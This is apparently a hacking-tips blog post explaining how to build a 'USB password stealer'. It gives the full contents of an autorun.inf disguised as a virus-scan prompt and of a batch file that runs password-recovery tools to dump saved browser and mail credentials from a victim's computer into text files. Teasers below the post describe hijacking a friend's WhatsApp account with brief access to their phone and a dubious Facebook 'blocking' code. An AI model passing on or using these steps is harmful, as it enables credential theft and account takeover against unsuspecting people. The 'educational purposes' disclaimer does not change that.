Skip to main content

What is "USB Stealer" ? & How it is Work?

                             

 Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations. We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords. As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make a USB password stealer and steal saved passwords.

Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.

To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.

 THINGS YOU WILL NEED

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc.

IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer. Protected storage pass viewer(PSPV) - Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express, and MSN Explorer.

Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.

ChromePass - ChromePass is a small password recovery tool that allows you to view the usernames and passwords stored by Google Chrome Web browser.

STEPS :

1. First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and input the following text:

[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the "autorun.inf" file onto your USBStick.

3. Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt

4. Save the Notepad and rename it from "New Text Document.txt" to "launch.bat"

5. Copy the "launch.bat" file onto your USB drive. Now your USB Password stealer is ready, all you have to do is insert it in your victim's computer and a popup will appear. In the popup window, select the option "launch virus scan."

After this you can see saved password in .TXT files

Purely for educational purposes. Use these tools at your own risk!
                           
Labels:

Comments

Post a Comment

Popular posts from this blog

Facebook Shortcut Key

''''''''FACEBOOK SHORTCUTS'''''''' For Facebook Help Center - Shift+Alt+0 For Facebook Home Page - Shift+Alt+1 For Your Facebook Profile Page - Shift+Alt+2 For Friend Request - Shift+Alt+3 For Messages - Shift+Alt+4 For Notification - Shift+Alt+5 For Account Settings - Shift+Alt+6 For Privacy Settings - Shift+Alt+7 For Facebook Pages - Shift+Alt+8 For Facebook Terms of Use - Shift+Alt+9 For enable Search - Shift+Alt+? For Compose a New message - Shift+Alt+m :::Enjoy:::
1 comment
Read more

How to Hack Whatsapp account?

Hello friends, In this article you will learn how we can access  our friends Whatsapp account. As you know that Whatsapp, Facebook, Twitter and other social organizations are investing many dollars for their privacy and security and hackers cannot easily hack their user accounts. But I am telling you just a trick to hack our friend’s Whatsapp account. It is so simple trick by which you can hack only our well known persons account. Requirements: Victims device for 15 seconds. Patience. Now you are ready for hack the account…….. Step 1: Download Firefox browser on your mobile from your app store either apple or google. Step 2: Open  Firefox  and type  web.whatsapp.com  on URL bar.  >>  Step 3: Now go to options and tick on  Request Desktop Site . Now you will see like this. Step 4: Take victim’s device on your hand and your 15 seconds start from here. Step 5: Now Navigate according to Victim’s mobile. Android, Windows Phone, Nokia S60:   Whatsapp  &g
2 comments
Read more

HOW TO BLOCK SOMEONE’S FACEBOOK ACCOUNT?

How to BLOCK someone’s FB account Hello Friends, if you want to block someone’s Facebook account block then here I have a code sharing to you. Your conversation must be with your victim. You have to just send a code to him and say for comment anyone’s post weather that is post or status. Now see step by steps with photos and follow it. #Note: Please don’t try this with your account. REQUIREMENT: Little bit trust of victim on you. Patience Now only you have to do this : STEP 1: Copy this code and say to your victim for commenting on anyone’s post by removing #. ( Don’t forget to remember him to removing #(hash) ) http://#34255353309 Your work is over. Now see what will happen with your Victim. First he will comment that code by removing # on anyone’s post.                           As he will comment, a message will show to him of occurring an error.                            He will automatically logged out and again he will try to log in.        
1 comment
Read more